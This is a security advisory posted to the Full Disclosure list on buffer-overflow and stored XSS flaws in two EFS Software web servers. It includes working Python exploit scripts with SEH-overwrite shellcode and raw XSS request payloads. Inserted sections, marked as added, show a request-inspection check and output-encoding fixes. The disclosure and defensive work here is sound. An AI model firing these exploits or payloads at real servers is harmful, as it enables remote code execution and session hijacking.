Message-ID: <CANoQWWeJiEbMXyStQU4+f3GoJMTNr8tgKNXGonZUcjgEbHY7ng@mail.gmail.com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497] Multiple vulnerabilities in EFS Software products
# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on: Windows 7, 10
# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119
Vulnerability description: There is a remote stack-based buffer overflow
(SEH overwrite) in /searchbook.ghp in EFS Software Easy Address Book Web
Server 1.6. By sending an overly long string in the name parameter of a POST
request to /searchbook.ghp (the search-by-name form), an attacker may be able
to execute arbitrary code.
Proof of concept:
import socket
import struct

# Python 2 syntax (print statements; str literals are raw bytes)
def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll
    shellcode_WinExec = (
        "\x33\xc0"               # XOR EAX,EAX
        "\x50"                   # PUSH EAX => padding for lpCmdLine
        "\x68\x2E\x65\x78\x65"   # PUSH ".exe"
        "\x68\x63\x61\x6C\x63"   # PUSH "calc"
        "\x8B\xC4"               # MOV EAX,ESP
        "\x6A\x01"               # PUSH 1
        "\x50"                   # PUSH EAX
        "\xBB\x91\x2c\x6f\x77"   # MOV EBX,kernel32.WinExec
        "\xFF\xD3")              # CALL EBX
    shellcode_system = (
        "\x31\xC9"               # xor ecx,ecx
        "\x51"                   # push ecx
        "\x68\x63\x61\x6C\x63"   # push 0x636c6163
        "\x54"                   # push dword ptr esp
        "\xB8\x6f\xb1\xdc\x75"   # mov eax,msvcrt.system
        "\xFF\xD0")              # call eax
    shellcode = shellcode_WinExec

    # SEH
    junk1 = "A"*455
    buffer = junk1
    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode
    buffer += struct.pack('<L',0x1001071e)  # pop/pop/ret @ 0x1001071e SSLEAY32.DLL from !Mona 0x1001071e
    buffer += "\x90" * 20
    buffer += shellcode
    junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)
    buffer += junk2
    return buffer

def REQ_POST (padding):
    POST = (
        "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: " + str(108 + len(padding))+ "\r\n"
        "Connection: keep-alive\r\n"
        "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"
        "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "Host: "+str(ip)+"\r\n\r\n"
        "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding +
        "&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"
    )
    return POST

ip = '192.168.X.X'
port = 80
payload = sendbuff()
try:
    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_POST(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended POST length " + str(len(payload))
except:
    print "Connecting error"
# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /addrbook.ghp (POST method)
in multiple parameters.
Proof of concept:
POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost
addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save
Vulnerable parameters: firstname, homephone, lastname, middlename,
workaddress, workcity, workcountry, workphone, workstate, workzip
Response:
<TR>
<TD class=row2><SPAN class=genmed><A target=_blank
class=genmed href="viewcontact.ghp?id=1&cid=12">demo1
</a><script>alert(1);</script><a> demo1</A></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="mailto:
demo1@...o1.com">demo1@...o1.com</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed>demo1, , , ,
USA</SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a
href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1
</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>
# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /users_admin.ghp (POST
method, authenticated Admin user) in multiple parameters.
Proof of concept:
Example 1:
POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update
Vulnerable parameter: email
Response:
<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>
Example 2:
POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update
Vulnerable parameter: username
Response:
<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15"
value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15"
value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value="
tt@...fs.com"> </TD>
<TD class=row2 align=left><select name="level"><option
>guest</option><option selected>user</option><option >power
user</option></select></TD>
<TD class=row2 align=left><select name="state"><option
selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update"
name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed
href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on: Windows 7, 10
# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119
Vulnerability description: There is a remote stack-based buffer overflow
(SEH overwrite) in register.ghp in EFS Software Easy Chat Server versions
2.0 to 3.1. By sending an overly long username parameter in a GET request to
register.ghp, an attacker may be able to execute arbitrary code.
Proof of concept:
import socket

# Python 2 syntax (print statements; str literals are raw bytes)
def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = (
        "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
        "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
        "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
        "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
        "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
        "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
        "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
        "\x1c\x39\xbd"
    )
    # SEH
    junk1 = "A"*473
    buffer = junk1
    buffer += "\xeb\x06\x90\x90"   # short jmp to shellcode
    buffer += "\x1e\x0e\x01\x10"   # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona
    buffer += shellcode
    junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)
    buffer += junk2
    return buffer

def REQ_GET (padding):
    GET = (
        "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
        "Host: "+str(ip)+":80\r\n"
        "Accept-Language: es-es\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://"+str(ip)+"\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )
    return GET

ip = '192.168.X.X' # change the ip address
port = 80
payload = sendbuff()
try:
    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended GET length " + str(len(payload))
except:
    print "Connection error"
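A request-inspection check for the two overflow parameters described above (name on /searchbook.ghp under CVE-2023-4491, username on /register.ghp under CVE-2023-4494), added here as an example; it is not part of the advisory or its PoCs. The per-field length limits and the two sample requests are constructed for the example, and the body is assumed to be form-urlencoded.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed per-parameter length limits (not from the advisory): the two
# fields that overflow are "name" (searchbook.ghp, POST body) and "username"
# (register.ghp, query string); anything else gets a generous default.
MAX_LEN = {"name": 128, "username": 64}
DEFAULT_MAX_LEN = 512
NON_PRINTABLE = re.compile(r"[^\x20-\x7e\t\r\n]")
# Constructed samples: an ordinary search, and a GET whose username runs to
# hundreds of bytes and ends in percent-encoded raw bytes.
BENIGN_REQUEST = (
    b"POST http://192.0.2.10/searchbook.ghp?id=1 HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"addrbookid=1&contactid=&cancelflag=0&name=Alice&Email=&search=Start+Search"
)
SUSPECT_REQUEST = (
    b"GET /register.ghp?username=" + b"A" * 600 + b"%90%90%EB%06"
    + b"&password= HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
)

def extract_params(raw_request):
    """Return (method, path, [(key, value), ...]) for a raw HTTP/1.x request,
    merging the query string with a form-urlencoded POST body. Bytes are
    decoded as latin-1 so that every byte survives as exactly one character."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    fields = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    method, target = fields[0], (fields[1] if len(fields) > 1 else "/")
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True, encoding="latin-1")
    if method == "POST" and body:
        params += parse_qsl(body.decode("latin-1"), keep_blank_values=True,
                            encoding="latin-1")
    return method, parts.path, params

def find_overflow_candidates(raw_request):
    """Flag parameters shaped like the overflow payloads in this advisory: far
    longer than any real name, or carrying non-printable bytes (a jump stub, an
    SEH record and shellcode are binary, not text). Returns (path, key, reason)."""
    findings = []
    _, path, params = extract_params(raw_request)
    for key, value in params:
        limit = MAX_LEN.get(key, DEFAULT_MAX_LEN)
        reasons = []
        if len(value) > limit:
            reasons.append("length %d > %d" % (len(value), limit))
        if NON_PRINTABLE.search(value):
            reasons.append("non-printable bytes")
        if reasons:
            findings.append((path, key, "; ".join(reasons)))
    return findings

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, SUSPECT_REQUEST):
        print(find_overflow_candidates(req) or "clean")
```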
# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Resume
parameter. The injected script is rendered when /register.ghp is loaded.
Proof of concept:
POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost
UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change
Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>
Go to:
http://localhost/register.ghp?username=<redacted>&password=<redacted>
Response - xss:
<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30"
name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>
# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /body2.ghp (POST method) in the mtowho parameter.
Proof of concept:
POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost
staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=
Response:
<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font
color=green size=2>08:22:16 <a target=chatsubmit
href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> =>
<a target=chatsubmit
href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a>
</font><font color=#000000 size=2>demo </font> <img src=/face/100.gif
border=0>";
// -->
</script>
</body>
</html>
# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3
CVSS v3: 6.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Icon
parameter. The injected script is rendered when /users.ghp is loaded.
Proof of concept:
POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change
Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>
When the user information page loads:
http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4
<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a
href="javascript:parent.chatsubmit.getname('All');"
target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&
parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/""><script>alert(111)</script><i>[<a
href="javascript:parent.chatsubmit.getname('<redacted>');"
target="chatsubmit"><redacted></a>]<==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>
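The three output contexts the stored XSS findings on this page land in (an HTML attribute value for CVE-2023-4492, CVE-2023-4493 and CVE-2023-4497, TEXTAREA text for CVE-2023-4495, and a string built inside a script block for CVE-2023-4496), each rendered the vulnerable way beside an encoded form. This is an added example, not the vendor's code; the render functions are hypothetical stand-ins for the .ghp templates, and the inputs are constructed from the payload shapes in the PoCs above.

```python
import html
import json

# Constructed inputs shaped like the advisory's payloads for three output
# contexts: an HTML attribute (users_admin.ghp email/username), TEXTAREA text
# (registresult.htm Resume) and a string built inside a <script> block
# (body2.ghp mtowho).
ATTR_PAYLOAD = '"><script>alert(1);</script>'
TEXTAREA_PAYLOAD = '</TEXTAREA><script>alert(1)</script><TEXTAREA>'
JS_PAYLOAD = "</script><script>alert(1);</script><script>"

def render_input_unsafe(name, value):
    """The pattern behind the vulnerable responses: raw concatenation."""
    return '<input type="text" name="%s" value="%s">' % (name, value)

def render_input_safe(name, value):
    """Attribute context: quote=True also encodes the double quote, so the
    attribute cannot be closed early and no tag can start inside it."""
    return '<input type="text" name="%s" value="%s">' % (name, html.escape(value, quote=True))

def render_textarea_unsafe(value):
    return '<TEXTAREA rows="4" cols="30" name="Resume">%s</TEXTAREA>' % value

def render_textarea_safe(value):
    """TEXTAREA content is still scanned for its own end tag, so it needs the
    same entity encoding as ordinary text."""
    return '<TEXTAREA rows="4" cols="30" name="Resume">%s</TEXTAREA>' % html.escape(value)

def js_string_literal(value):
    """JS string context: a JSON literal with / escaped, so a </script> inside
    the value cannot terminate the enclosing script block."""
    return json.dumps(value).replace("/", "\\/")

def chat_line_unsafe(who, message):
    """body2.ghp style: a script block that appends raw markup via innerHTML."""
    return ('parent.board.document.body.innerHTML += "<b>%s</b> => %s";'
            % (who, message))

def chat_line_safe(who, message):
    """Encode for the innermost context first (HTML, because the string lands
    in innerHTML), then for the outer JavaScript string literal."""
    markup = "<b>%s</b> => %s" % (html.escape(who, quote=True),
                                  html.escape(message, quote=True))
    return "parent.board.document.body.innerHTML += %s;" % js_string_literal(markup)

if __name__ == "__main__":
    print(render_input_safe("email", ATTR_PAYLOAD))
    print(render_textarea_safe(TEXTAREA_PAYLOAD))
    print(chat_line_safe(JS_PAYLOAD, "demo"))
```

A value that is later evaluated as a javascript: URL (the getname('...') links in the responses above) needs a further JS-string layer before the attribute encoding; the example stops at the two layers it shows.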
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/